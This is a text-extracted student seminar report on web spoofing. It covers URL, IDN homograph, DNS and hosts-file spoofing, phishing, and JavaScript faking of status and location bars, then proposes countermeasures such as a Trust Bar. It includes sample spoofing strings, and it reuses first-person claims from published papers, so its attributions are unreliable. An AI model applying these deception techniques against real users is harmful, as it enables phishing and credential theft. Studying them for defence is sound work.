8/14/2019 Web Spoooofing

1/24

ABSTRACTThe web spoofing describes an Internet security attack that couldendangerthe privacy of World Wide Web users and the integrity of their data.

The attackcan be carried out on today's systems, endangering users of the mostcommon Webbrowsers. Web spoofing allows an attacker to create a "shadow copy"of the entireWorld Wide Web. Accesses to the shadow Web are funneled throughtheattacker's machine, allowing the attacker to monitor all of the victim'sactivitiesincluding any passwords or account numbers the victim enters. The

attacker canalso cause false or misleading data to be sent to Web servers in thevictim's name,or to the victim in the name of any Web server. In short, the attackerobserves andcontrols everything the victim does on the Web. First, the attackercauses abrowser window to be created on the victim's machine, with some ofthe normalstatus and menu information replaced by identical-looking components

suppliedby the attacker. Then, the attacker causes all Web pages destined forthe victim'smachine to be routed through the attacker's server. On the attacker'sserver, thepages are rewritten in such a way that their appearance does notchange at all, butany actions taken by the victim would be logged by the attacker. Inaddition, anyattempt by the victim to load a new page would cause the newly-loaded page to berouted through the attacker's server, so the attack would continue on

the new page. 1.INTRODUCTIONWeb Spoofing is a security attack that allows an adversary to observe andmodify allweb pages sent to the victim's machine, and observe all information enteredinto

8/14/2019 Web Spoooofing

2/24

forms by the victim. Web Spoofing works on both of the major browsers andis notprevented by "secure" connections. The attacker can observe and modify allwebpages and form submissions, even when the browser's "secure connection"

indicator islit. The user sees no indication that anything is wrong.The attack is implemented using JavaScript and Web server plug-ins, andworks intwo parts. First, the attacker causes a browser window to be created on thevictim'smachine, with some of the normal status and menu information replaced byidenticallookingcomponents supplied by the attacker. Then, the attacker causes all Webpagesdestined for the victim's machine to be routed through the attacker's server.

On theattacker's server, the pages are rewritten in such a way that theirappearance does notchange at all, but any actions taken by the victim (such as clicking on a link)would belogged by the attacker. In addition, any attempt by the victim to load a newpagewould cause the newly-loaded page to be routed through the attacker'sserver, so theattack would continue on the new page.The attack is initiated when thevictim visits a

malicious Web page, or receives a malicious email message (if the victimuses anHTML-enabled email reader).We have implemented a demonstration of the Web Spoofing attack and haveshownthe demo live at the Internet World conference and on MSNBC television.Althoughthe implementation is not trivial, it is well within the means of a singlededicatedprogrammer.Current browsers do not prevent Web Spoofing, and thereseems to be

little movement in the direction of addressing this problem. We believe thatthere canbe no secure electronic commerce on the Web until the Web Spoofingvulnerabilityhas been addressed.Many false claims have been made about Web Spoofing,andsome people who make public statements about Web Spoofing do notunderstand the

8/14/2019 Web Spoooofing

3/24

full scope of the problem. If you want to understand Web Spoofing, pleaseread myseminar report on this topic. I worked hard to make it accessible to non-experts.1

Division of Computer EngineeringWEB SPOOFING

2.PREVIOUS WORKSAs early as 1996, Felten et al at Princeton [8] originated the term webspoofing and explored spoofing attacks on Netscape Navigator and MicrosoftInternetExplorer that allowed an attacker to create a shadow copy of the true web.Whenthe victim accesses the shadow Web through the attackers servers, theattacker canmonitor all of the victims activities and get or modify the information the

victimenters, including passwords or credit card numbers. Source code is notavailable;according to the paper, the attack used JavaScript to rewrite the hyperlinkinformationshown on the status bar; to hide the real location bar and replace it with afake onethat also accept keyboard input, allowing the victim to type in URLs normally(whichthen get rewritten to go the attackers machine); and to replace theDocument Source

button the menu bar (to show the source the victim expects, not the realsource).Apparently unable to spoof the SSL icon, the Princeton attack spoofed SSL byhavingthe user open a real SSL session to the attackers machine.In 1996, Tygar and Whitten from CMU [20] demonstrated how a Javaapplet or similar remote execution can be used as a trojan horse. The Javaappletcould be inserted into a client machine through a bogus remote page andpop up adialog window similar to the true login windows. With the active textfield on

the topof the image, the Trojan horse applet would capture the keyboard input andtransferthem to attackers machine. Tygar and Whitten also gave a way to preventtheseattack: window personalization.2Division of Computer Engineering

8/14/2019 Web Spoooofing

4/24

WEB SPOOFING

3.TYPES OF SPOOFINGThere are different types of spoofing like IP spoofing , Email spoofing ,webspoofing the small introduction is given below:

3.1 IP spoofing:Attacker uses IP address of another computer to acquire information or gainaccess.IP spoofing is the creation of TCP/IP packets with somebody else's IP addressin theheader. Routers use the destination IP address to forward packets, but ignore thesource IPaddress. The source IP address is used only by the destination machine, when itresponds

back to the source. When an attacker spoofs someones IP address, the victims reply goesback to thataddress. Since the attacker does not receive packets back, this is called a one-wayattackorblind spoofing. To see the return packets, the attacker must interceptthem.

3.2 Email spoofing: Attacker sends email but makes it appear to comefromsomeone else.With email spoofing, someone receives email that appears to have originatedfromone source when it actually was sent from another source.Purposes of email spoofing:3Division of Computer EngineeringWEB SPOOFING

Hiding senders identity Impersonating someone Implicating someone Trick someone into making a damaging statement or releasing sensitiveinformationNote that anonymous email can be sent using an anonymous remailer (spamvehicles)

3.3 Web spoofing: Attacker tricks web browser into communicatingwith adifferent web server than the user intended.

8/14/2019 Web Spoooofing

5/24

Web spoofing is tricking someone into visiting a web site other than theone theyintend to and mimicking the intended site. In this way, an attacker may obtain confidential information. They can also provide false or misleading information.

They can even create a shadow copy of the whole web to the victim.3.4 URL spoofing: URL spoofing deals with the different ways of makingaspoofed site URL resemble a genuine site URL. In doing so, the attacker mayhave abetter chance at succeeding, especially with inexperienced users who areunfamiliarwith phishing. Another way of masking the URL is done by including a usernameand password. Web servers that require authentication may be accessedusing the

URL string format username:password@domain.com. User name andpasswords inURLs may be used regardless of whether the web server enforces this or not.Theinformation is simply ignored if not. User names are not limited to just lettersandnumbers, so for instance www.paypal.com could very much be a validchoice.Consequently, an attacker could construct a URL such as4Division of Computer Engineering

WEB SPOOFINGhttp://www.paypal.com:80@192.168.0.1/ where www.paypal.com is theuser name,80 is the password, and 192.168.0.1 is the malicious site. It is also possibleto omit thepassword completely. The method is, however, not as much used anymoreasbrowsers now notify when a user name and password in the URL is used (andthat aphishing attempt could take place).

3.5 IDN spoofing: Since the introduction of internationalized domain

names(IDN), domain names may now also include country-specific characters.Unfortunately, some foreign language characters look almost the same ascertainLatin characters, and may therefore also be used in phishing attempts. Notonly doesthis allow attackers to register domain names that look exactly like another,but it also

8/14/2019 Web Spoooofing

6/24

allows the use of security certificates which appears to be for a legitimatedomain. Agood example is the paypal.com case in which the Cyrillic a replaces theLatin a,http://www.pypal.com/s. In Unicode, decimal 1072 represents the

Cyrillic a.For the Unicode strings to be mapped into the limited character setsupported by the DNS (domain name system), Punycode is used. Punycode isappliedto each component of a domain name address (subdomain, domain name,and topleveldomain) which contains characters not found in the ASCII character set. Foreach translated Punycode string, a prefix xn-- is added. Any foreigncharacter is thenstripped and replaced by a trailing code. Using the same example as above,the result

would become www.xn--pypal-4ve.com. Because Punycode enableswebsites to usefull Unicode names, web browsers including Firefox and Opera now use awhite-listof TLDs2 that have policies for which characters are permitted andprocedures formaking sure that no homographic domains are registered to two differententities.While a white-listed TLD will be displayed in Unicode, any untrusted TLD willbedisplayed in Punycode with the xn-- prefix. Dot com is not part of this list and

willtherefore be displayed in Punycode.

3.6 DNS spoofing: DNS spoofing attacks or poisoning attacks areattacks inwhich attackers attempt to feed incorrect mappings between IP addressesand hostnames to the DNS server. As DNS queries are usually submitted over UDP,serverscannot rely on the transport protocol to maintain state of the DNSconnection.Therefore, in order to match a response with a query, DNS servers include a

numeric5Division of Computer EngineeringWEB SPOOFING

query ID in the DNS payload. If the attacker can predict the query ID, it ispossible tocraft a spoofed response before a real response is returned to the DNSserver. The

8/14/2019 Web Spoooofing

7/24

DNS usually believes the first response it receives, and discards anyadditionalresponses which then are considered duplicates. Consequently, anyone wholooks upthe spoofed domain record will be redirected to the attackers site.

Another way of performing a DNS cache poisoning attack, can be doneon the victims computer. Every system has a host file in its system directoryused toassociate host names with IP addresses. This is actually the job of a DNSserver, butby adding records to the hosts file, one may hard code domain nametranslations andredirect users to different sites. The hosts file is located in %SystemRoot%\system32\drivers\etc in the Windows environment, and may also be found under /etc inUNIXbased

systems. Each line in the hosts file represents an entry. The first columnspecifies the IP address followed by the corresponding host name. Mostsystems maplocalhost to the loopback address as shown below.127.0.0.1 localhost Normally, when you attempt to access domain.com, arequest issent to a DNS server the find out the IP address for that domain name. Oncethishas been done, the HTTP request is forwarded to the proper web server.However, ifwe were to insert a custom entry for domain.com in the hosts file, the

request wouldbe forwarded to this address instead. 127.0.0.1 localhost 192.168.0.2domain.comAn attacker could use this method to direct users to a web site that heor she controls, even if the victim types http://domain.com in the address barof theweb browser.

3.7 Proxy spoofing: It is also possible to redirect users to malicioussites bydefining proxies in the browser configuration. This is usually done by havingthe user

install some sort of web extension (aka trojan/spyware) which then canoverridethe settings present in the web browse6Division of Computer EngineeringWEB SPOOFING

4.THREAT MODELS AND ATTACKS

8/14/2019 Web Spoooofing

8/24

The initial design of Internet and Web protocols assumed benignenvironment, where servers, clients and routers cooperate and follow thestandardprotocols, except for unintentional errors. However, as the amount andsensitivity of

usage increased, concerns about security, fraud and attacks becameimportant. Inparticular, since currently Internet access is widely available, it is very easyforattackers to obtain many client and even host connections and addresses,and use themto launch different attacks on the network itself and on other hosts andclients. Inparticular, with the proliferation of commercial domain name registrarsallowingautomated, low-cost registration in most top level domains, it is currently

very easyfor attackers to acquire essentially any unallocated domain name, and placetheremalicious hosts and clients.We call this the unallocated domain adversary : an adversary who is able toissue and receive messages using many addresses in any domain name,excluding thefinite list of already allocated domain names. This is probably the most basicandcommon type of adversary.Unfortunately, we believe, as explained below, that currently, most web

users arevulnerable even against unallocated domain adversaries. This claim may besurprising, as sensitive web sites are usually protected using the SSL or TLSprotocols, which, as we explain in the following subsection, securelyauthenticate webpages even in the presence of intercepting adversaries . Interceptingadversaries areable to send and intercept messages to and from all domains. Indeed, evenwithoutSSL/TLS, the HTTP protocol securely authenticates web pages againstspoofing

adversaries, which are able to send messages from all domains, but receiveonlymessages sent to unallocated domains. However, the security by SSL/TLS isonlywith respect to the address (URL) and security mechanism (HTTPS, usingSSL/TLS,or `plain` HTTP) requested by the application (usually browser). In a phishingattack

8/14/2019 Web Spoooofing

9/24

(and most other spoofing attacks), the application specifies, in its request,the URL ofthe spoofed site. Namely, web spoofing attacks focus on the gap betweentheintentions and expectations of the user, and the address and security

mechanismspecified by the browser to the transport layer.7Division of Computer EngineeringWEB SPOOFING

5.HOW WEB SPOOFING WORKS ?Web spoofing is a kind of electronic con game in which the attacker createsaconvincing but false copy of the entire World Wide Web. The false Web looksjustlike the real one: it has all the same pages and links. However, the attacker

controlsthe false Web, so that all network traffic between the victim's browser andthe Webgoes through the attacker.Consequences Since the attacker can observe or modify any data going fromthevictim to Web servers, as well as controlling all return traffic from Webservers to thevictim, the attacker has many possibilities. These include surveillance andtampering.Surveillance The attacker can passively watch the traffic, recording which

pages thevictim visits and the contents of those pages. When the victim fills out aform, theentered data is transmitted to a Web server, so the attacker can record thattoo, alongwith the response sent back by the server. Since most on-line commerce isdone viaforms, this means the attacker can observe any account numbers orpasswords thevictim enters.The attacker can carry out surveillance even if the victim has a "secure"

connection(usually via Secure Sockets Layer) to the server, that is, even if the victim'sbrowsershows the secure-connection icon (usually an image of a lock or a key).Tampering The attacker is also free to modify any of the data traveling ineitherdirection between the victim and the Web. The attacker can modify formdata

8/14/2019 Web Spoooofing

10/24

submitted by the victim. For example, if the victim is ordering a product on-line, theattacker can change the product number, the quantity, or the ship-toaddress.The attacker can also modify the data returned by a Web server, for example

byinserting misleading or offensive material in order to trick the victim or tocauseantagonism between the victim and the server.8Division of Computer EngineeringWEB SPOOFING

6.SPOOFING THE WHOLE PAGE:Fig 6.1 whole spoofed page In a spoofing attack, the attacker creates misleading context in order totrick

the victim into making an inappropriate security-relevant decision. Aspoofingattack is like a con game: the attacker sets up a false but convincing worldaround the victim. The victim does something that would be appropriate ifthefalse world were real. Unfortunately, activities that seem reasonable in thefalse world may have disastrous effects in the real world. Spoofing attacks are possible in the physical world as well as theelectronicone. For example, there have been several incidents in which criminals setup

bogus automated-teller machines, typically in the public areas of shoppingmalls . The machines would accept ATM cards and ask the person to entertheir PIN code. Once the machine had the victim's PIN, it could either eat thecard or "malfunction" and return the card. In either case, the criminals hadenough information to copy the victim's card and use the duplicate. In theseattacks, people were fooled by the context they saw: the location of the9Division of Computer EngineeringWEB SPOOFING

machines, their size and weight, the way they were decorated, and theappearance of their electronic displays. People using computer systems often make security-relevant decisionsbasedon contextual cues they see. For example, you might decide to type in yourbank account number because you believe you are visiting your bank's Webpage. This belief might arise because the page has a familiar look, becausethebank's URL appears in the browser's location line, or for some other reason.

8/14/2019 Web Spoooofing

11/24

To appreciate the range and severity of possible spoofing attacks, wemustlook more deeply into two parts of the definition of spoofing: security-relevantdecisions and context.

10Division of Computer EngineeringWEB SPOOFING

7. HOW DOES THE ATTACK WORKS ?The first vulnerability is due to the validation that the server's public key,which SSLobtains from the servers certificate, belongs to the site with the givenlocation(URL). This validation is the responsibility of the application (e.g. browser)and notpart of the SSL/TLS specifications; SSL/TLS merely passes the servers

certificate tothe application. Currently, browsers are vulnerable to the false certificateattack,where the adversary receives a certificate for the domain of the victim webpage froma CA trusted by the browser, but containing a public key generated by theadversary.Therefore, the adversary has the matching private key and can pass SSLserverauthentication for the victim web page. We now explain how the falsecertificate

attack works. In the current design of browsers, the user is responsible tovalidate theauthenticity of web sites, by noting relevant status areas in the browser userinterface.The relevant status areas are the location bar, containing the URL (UniversalResource Locator), and the SSL indicator (typically, as open lock for insecuresites,closed lock for SSL/TLS protected sites). We are mostly interested in the webspoofing attack, which exploits this vulnerability, by directing the browser toanadversary-controlled clone site that resembles the original, victim site, which

the userwanted to access. Web spoofing attacks are very common, and are the mostseverethreat to secure e-commerce currently. As we explain below, most webspoofingattackers simply rely on the fact that many users may not notice an incorrectURL or

8/14/2019 Web Spoooofing

12/24

the lack of SSL indicator, when approaching their online banking site (orothersensitive site). Therefore, an attacker can circumvent the SSL siteauthenticationtrivially, by not using SSL and/or by using a URL belonging to a domain

owned orcontrolled by the attacker, for which the attacker can obtain a certificate.Moreadvanced attacks can mislead even users that validate the SSL indicator andlocationbar (containing URL).11Division of Computer EngineeringWEB SPOOFING

Fig 7.1 HTTP request response process with SSL protectionThe first challenge for a web spoofing attack is to cause the browser to

receive theclone site, when the customer is really looking for the victim site. Theattacker canexploit different parts of the process of receiving a (sensitive) web page. Weillustratethe typical scenario of receiving a sensitive web page in Figure 3. Theprocess beginswhen the user selects the web site, by entering its location (URL) or byinvoking abookmark or link, e.g. in an e-mail message (step 1a). The browser, or theunderlying

transport layer, then sends the name of the domain of the site, e.g. xxx.com,to aDomain Name Server (step 2a). The Domain Name Server returns the IPaddress ofthe site (step 2b). Now, the client sends an HTTP request to the site, usingthe IPaddress of the site (step 3a), and receives the HTTP response containing theweb page(step 3b); these two steps are protected by SSL, if the URL indicates the useof SSL(by using the https protocol in the URL). Finally, the browser presents the

page to theuser (step 1b). If we did notuse SSL, an intercepting adversary could attackall threepairs of steps in this process, as follows:1. Trick the user into requesting the spoofed web site in step 1a, and/or intousinghttp rather than https, i.e. not protect the request and response using SSL.12

8/14/2019 Web Spoooofing

13/24

Division of Computer EngineeringWEB SPOOFING

2. Return an incorrect IP address for the web server in step 2b. This can bedoneby exploiting one of the known weaknesses of the DNS protocol and/or of

(many)DNS servers. A typical example is DNS cache poisoning (`pushing` falsedomainIPmappings to the cache of DNS servers).3. Intercept (capture) the request in step 3a (sent to the right IP address)andreturn a response in step 3b from the spoofed site.The third attack requires the adversary to intercept messages, which isrelatively hard(requires `man in the middle`, intercepting adversary). The second attackrequires

defeating DNS security, which is often possible, but may be difficult (exceptfor anintercepting adversary). Hence, most spoofing attacks against SSL/TLSprotected websites focus on the first attack, i.e. tricking the user into requesting thespoofed web siteand/or into using an insecure connection (without SSL) rather than an SSL-protectedconnection.Most web-spoofing attacks, however, use methods which do not requireeither

interception of messages to `honest` web sites, or corruption of servers or ofthe DNSresponse; these methods work even for the weak `unallocated domain`adversary. Onemethod is URL redirection, due to Felten et al. [FB*97]. This attack beginswhen theuser accesses any `malicious` web site controlled by the attacker, e.g.containing somecontent; this is the parallel of a Trojan software, except that users are lesscautiousabout approaching untrusted web sites, as browsers are supposed to remain

secure.The attack works if the user continues surfing by following different linksfrom thismalicious site. The site provides modified versions of the requested pages,where alllinks invoke the malicious site, which redirects the queries to their intendedtarget.

8/14/2019 Web Spoooofing

14/24

This allows the malicious site to continue inspecting and modifying requestsandresponses without the user noticing, as long as the user follows links.However, thisattack requires the attacker to attract the user to the malicious web site. In

practice,attackers usually use an even easier method to direct the user to thespoofed site:phishing spoofing attacks, usually using spam e-mail messages. In Figure 4wedescribe the process of typical phishing attack used to lure the user into aspoofed website. The adversary first buys some unallocated domain name, often relatedto thename of the target, victim web site. Then, the adversary sends spam(unsolicited e-

13Division of Computer EngineeringWEB SPOOFING

mail) to many users; this spam contains a `phishing bait message`, luringthe user tofollow a link embedded in the bait message. The mail message is a forgery:its sourceaddress is of the victim entity, e.g. abank that the user uses (or may use), and its contents attempt to coerce theuser intofollowing a link in the message, supposedly to the victim organization, but

actually tothe phishing site. If the victim entity signs all its e-mail, e.g. using S/MIME orPGP[Z95], then our techniques (described later on) could allow the user to detectthisfraud. However, currently only a tiny fraction of the organizations signsoutgoing email,therefore, this is not an option, and many nave users may click on the link inthemessage, supposedly to an important service from the victim entity. The linkactually

connects the users to the spoofed web site, emulating the siteof the victim entity, where the user provides information useful to theattacker, suchas credit card number, name, e-mail addresses, and other information. Theattackerstores the information in some `stolen information` database; among otherusages, he

8/14/2019 Web Spoooofing

15/24

also uses the credit card number to purchase additional domains, and the e-mailaddresses and name to create more convincing spam messages (e.g. tofriends of thisuser).Currently most phishing attacks lure the users by using spam

(unsolicited,undesirable e-mail), as described above. However, we define phishingspoofing attackas (any method of) luring the user into directing his browser to approach aspoofedweb site. For example, an attacker could use banner-ads or other ads to lureusers to14Division of Computer Engineering

Fig 7.2 process of typical phishing spoofing attackWEB SPOOFING

the spoofed site. We believe spam is the main phishing tool simply sincecurrentlyspam is extremely cheap and hard to trace back to the attacker. Spammingis causingmany other damages, in particular waste of human time and attention, andofcomputer resources. Currently, the most common protection against spamappears tobe content based filtering; however, since phishing attacks emulate valid e-mail from(financial) service providers, we expect it to pass content-based filtering.

Proposalsfor controlling and preventing spam, e.g. [CSRI04, He04], may also help toprevent orat least reduce spam-based phishing.Most phishing spoofing attacks require only an unallocated web address andserver,but do not require intercepting (HTTP) requests of the user; therefore, evenweakattackers can deploy them. This may explain their popularity . This meansthat thedomain name used in the phishing attack is different from the domain name

of thevictim organization.15Division of Computer EngineeringWEB SPOOFING

8. COMPLETING THE ILLUSIONThe attack as described thus far is fairly effective, but it is not perfect. Thereis still

8/14/2019 Web Spoooofing

16/24

some remaining context that can give the victim clues that the attack isgoing on.However, it is possible for the attacker to eliminate virtually all of theremaining cluesof the attack's existence.

Such evidence is not too hard to eliminate because browsers are verycustomizable.The ability of a Web page to control browser behavior is often desirable, butwhen thepage is hostile it can be dangerous.Another artifact of this kind of attack is that the pages returned by thehacker interceptare stored in the user's browser cache, and based on the additional actionstaken by theuser; the spoofed pages may live on long after the session is terminated.

8.1 The Status Line:

The status line is a single line of text at the bottom of the browser windowthatdisplays various messages, typically about the status of pending Webtransfers.The attack as described so far leaves two kinds of evidence on the statusline. First,when the mouse is held over a Web link, the status line displays the URL thelinkpoints to. Thus, the victim might notice that a URL has been rewritten.Second, whena page is being fetched, the status line briefly displays the name of the

server beingcontacted. Thus, the victim might notice that http://www.attacker.org isdisplayedwhen some other name was expected.The attacker can cover up both of these cues by adding a JavaScript programto everyrewritten page. Since JavaScript programs can write to the status line, andsince it ispossible to bind JavaScript actions to the relevant events, the attacker canarrangethings so that the status line participates in the con game, always showing

the victimwhat would have been on the status line in the real Web. Thus the spoofedcontext16Division of Computer EngineeringWEB SPOOFING

becomes even more convincing.

8.2 The Location Line:

8/14/2019 Web Spoooofing

17/24

The browser's location line displays the URL of the page currently beingshown. Thevictim can also type a URL into the location line, sending the browser to thatURL.The attack as described so far causes a rewritten URL to appear in the

location line,giving the victim a possible indication that an attack is in progress.This clue can be hidden using JavaScript. A JavaScript program can hide thereallocation line and replace it by a fake location line which looks right and is intheexpected place. The fake location line can show the URL the victim expectsto see.The fake location line can also accept keyboard input, allowing the victim totype inURLs normally. Typed-in URLs can be rewritten by the JavaScript program

beforebeing accessed.Fig. 8.1 spoofed web page17Division of Computer EngineeringWEB SPOOFING

8.3 Viewing the Document Source:There is one clue that the attacker cannot eliminate, but it is very unlikely tobenoticed.By using the browser's "view source" feature, the victim can look at the

HTML sourcefor the currently displayed page. By looking for rewritten URLs in the HTMLsource,the victim can spot the attack. Unfortunately, HTML source is hard for noviceusers toread, and very few Web surfers bother to look at the HTML source fordocumentsthey are visiting, so this provides very little protection.A related clue is available if the victim chooses the browser's "viewdocumentinformation" menu item. This will display information including the

document's realURL, possibly allowing the victim to notice the attack. As above, this option isalmostnever used so it is very unlikely that it will provide much protection.18Division of Computer EngineeringWEB SPOOFING

9.COUNTERMEASURES

8/14/2019 Web Spoooofing

18/24

We first consider short-term solutions.

9.1 Disable JavaScript. Known Web spoofing techniuqes dependmostly onJavaScript. If the user disable browsers JavaScript, he will deny this attack.However,

modern web pages rely on JavaScript so much that many feel disabling it isimpractical for general Web surfing (although one of authors does thisanyway).Users should also take care that a browsers disable JavaScript optionactuallydisables JavaScript; an author personally encountered a Netscape platformthatignored the users option.

9.2 Customization.Tygar and Whitten suggested customization as acountermeasure against Trojan Horse applets. Customization of browserssetting is

also an effective way to enable users to detect Web spoofing. AlthoughunsignedJavaScript can detect the platform and browser which the client is using, wedo notyet know how to use it to detect the detailed window setting which mayaffect thebrowser display. The browser Opera has more customizable interface thanotherbrowers. From this point of view, Opera is more secure than other browsers.

9.3 Disable pop-up windows. Disabling pop-up window can stop webspoofing from opening a new window completely controlled by attacker.Unfortunately, disable pop-up only implemented as an option in browserKonqueror,which comes with KDE 2.0, only for Linux. However, one lesson from ourwork isthat browser-server interaction is such a rich space that one should becautious aboutasserting any particular barrier can render certain behaviors impossibleespeciallysince the behavior in question is not what happens in the platform butrather whatthe appears to be happening, to the user.

9.4 Long-term solutions. Our initial motivation was not to attack butto defend:to build a better browser that, for example, could clearly indicate securityattributesof a server (and so enable clients to securely use our serverhardeningtechniques [14,

8/14/2019 Web Spoooofing

19/24

15, 19]). None of above solutions are strong enough to be a general solutionforpreventing web spoofing. A ideal browser should be a platform which canenable allthe modern web techniques to be full functional, and at the same time

supplyunspoofable features to indicate the communication security.19Division of Computer EngineeringWEB SPOOFING

10. FUTURE SPOOFING WORKOur fake Web pages are not perfect. In our demonstration, we onlyimplement enoughto prove the concept; however, as noted earlier, we are not yet able to forgesomeaspects of legitimate browser behavior:

_ Creating convincing editable location lines appears to depend on the userpreferences, which we cannot yet learn. Either we gamble, or we do not haveeditablelines._ We cannot yet obtain the users genuine history information for the pulldownhistory options._ If the user resizes our fake Netscape windows, the content will not behaveasexpected._ As Netscape 6, with its modifiable formats, grows in popularity, we need to

examine how to provide spoofed material that either matches the usersformat, ordoes not cause undue alarm.20Division of Computer EngineeringWEB SPOOFING

11. IMPLICATIONS11.1 What are the current risks to Web users?Since spoofing each aspect of behavior of each common platform takes a lotof work, we do not believe that convincing long-lived shadow Web attacksarelikely. However, short-lived sessions with narrow user behavior are muchmoresusceptible. In theory, we could have connected our spoofed page to the realWebBlitzservice, put out some misleading links, and monitored our friends email.The emergence of common user interface technologies is also leading to a

8/14/2019 Web Spoooofing

20/24

continued blurring of the boundaries between what servers and browsers tellusers,and between internal and external data paths.For example, Netscapes Personal Security Managerhas been touted as thesolution

to client security management. However, the sequence of windows that popup tocollect the users password that protects these client keys are all easilyspoofableenabling remote malicious servers to learn these passwords. Furtherexploration herewould be interesting.Another interesting area would be to explore the potential of using spoofingforusers of Web-like OS interfaces.We are also examining the de facto semantics that current browsers offer for

certificate handling for various deviousbut legal sessions21Division of Computer EngineeringWEB SPOOFING

12. CONCLUSIONIn the developer community, currently web users, and in particular naveusers, arevulnerable to different web spoofing attacks; elsewhere, phishing andspoofing attacksare in fact increasingly common. In this paper, we describe browser and

protocolextensions that we are designing and implementing, that will help preventwebspoofing(and phishing) attacks. The main idea is to enhance browsers with amandatory Trust Bar (Trust Bar), with a fixed location at the top of every webpageThe most important credential is probably the Logo of the organization, usedtoprovide and re-enforce the brand; and, when some trusted authority certifiesthe logoor other credentials of the site, the logo of that trusted authority (e.g.

certificateauthority). Our hope is that browser developers will incorporate the Trust Baras soonas possible, i.e. make Trust Bar-enabled browsers. We hope to soon makeavailablethe source code of our implementation of the Trust Bar (for the Mozillabrowser), and

8/14/2019 Web Spoooofing

21/24

we will be happy to cooperate with others on creating high-quality opensource codeavailable. To conclude this paper, we present conclusions andrecommendations forusers and owners of sensitive web sites, such as e-commerce sites, for the

period untilbrowser are Trust Bar-enabled; see additional recommendations in [TTV04].We alsonote that even when using Trust Bar-enabled browsers, viruses and othermalicioussoftware may still be able to create unauthorized transactions, due tooperating systemvulnerabilities. We recommend that highly sensitive web sites such as e-brokerageconsider authorizing transactions using more secure hardware modules (seebelow).

Conclusions for Users of Sensitive Web-sitesThe focus of this paper was on ensuring security even for nave web users;however,even expert, cautious users can not be absolutely protected, unless browsersareextended with security measures as we propose or as proposed by [LY03,YS02,YS03]. However, cautious users can increase their security, even before thesiteincorporates enhanced security measures, by following the followingguidelines:

1. Use an Trust Bar-enhanced browser, using its `opportunistic logoidentification`mechanism to establish logos for each of your sensitive web-pages. Theauthorsdeveloped and use a simple Trust Bar extension to the Mozilla browser, andplan tomake it available for download from their homepages soon (after some finaltouches).22Division of Computer EngineeringWEB SPOOFING

2. Always contact sensitive web sites by typing their address in the locationbar,using a bookmark or following a link from a secure site, preferably protectedbySSL/TLS.3. Never click on links from e-mail messages or from other non-trustworthysources (such as shady or possibly insecure web sites). These could lead youto a

8/14/2019 Web Spoooofing

22/24

`URL-forwarding` man-in-the-middle attack, which may be hard orimpossible todetect, even if you follow guideline 1 above.4. Be very careful to inspect the location bar and the SSL icon upon enteringto

sensitive web pages. Preferably, set up your browser to display the details ofthecertificate upon entering your most sensitive sites (most browsers can dothis); thiswill help you notice the use of SSL and avoid most attacks. Do not trustindications ofsecurity and of the use of SSL when they appear as part of the web page,even whenthis page belongs to trustworthy organizations; see the examples of insecureloginpages in Figure 5, by respectable financial institutions and e-commerce sites.

5. If possible, restrict the damages due to spoofing by instructing yourfinancialservices to limit online transactions in your account to cover only what youreallyneed. Furthermore, consider using sensitive online services that useadditionalprotection mechanisms beyond SSLConclusions for Owners of Sensitive Web-sitesOwners of sensitive web-sites are often financial institutions, with substantialinterestin security and ability to influence their consumers and often even software

developers. We believe that such entities should seriously consider one ofthefollowing solutions:1. Provide your customers with a browser with security enhancements asdescribed here, and encourage them to install and use it. We notice that thebasic`Trust Bar` enhancement, available in our site as of August 2004 for Mozilla,maysuffice for most sites and customers. Many software integrators can performsuch23

Division of Computer EngineeringWEB SPOOFING

enhancements to Mozilla and other browsers easily, possibly takingadvantage of thesource code of our implementation.2. Use means of authenticating transactions that are not vulnerable to webspoofing. In particular, `challenge-response` and similar one-time userauthentication

8/14/2019 Web Spoooofing

23/24

solutions can be effective against offline spoofing attacks (but may still failagainst adetermined attacker who is spoofing your web site actively in a `man in themiddle`attack). Using SSL client authentication can be even more effective, and

avoid thehardware token (but may be more complex and less convenient to the user).3. Protect, using SSL/TLS, as many of your web pages as is feasible. Inparticular,be sure that every web form, i.e. web page requesting the user to enter(sensitive)information, is properly protected when it is sent to the user. Notice thatmanyrespectable companies (probably using respectable web-site designers) werenotcareful enough and have insecure web pages asking users to enter sensitive

information, as shown in Figure 5; this is insecure (the site may invoke SSL toprotectthe information, but the user cannot know this is not a spoofing site i.e. thispracticeallows a spoofing site to collect passwords).4. Use cookies to personalize the main web page of each customer, e.g.includepersonal greeting by name and/or by a personalized mark/picture (e.g. see[PM04]).Also, warn users against using the page if the personal greeting is absent.This will

foil many of the phishing attacks, which will be unable to presentpersonalized pages.We also recommend that site owners are careful to educate consumers onthe secureweb and e-mail usage guidelines, including these mentioned above, as wellas educatethem on the structure of domain name and how to identify their corporatedomains.This may include restricting corporate domains to only these that end with aclearcorporate identity.

24Division of Computer EngineeringWEB SPOOFING

13.REFERENCE1. http://webmasters-forums.com/web-spoofing-t-402.html2.http://www.washington.edu/computing/windows/issue22/spoofing.html

8/14/2019 Web Spoooofing

24/24

3. http://www.cs.princeton.edu/sip/WebSpoofing/4. http://www.cs.princeton.edu/sip/pub/spoofing.html25Division of Computer Engineering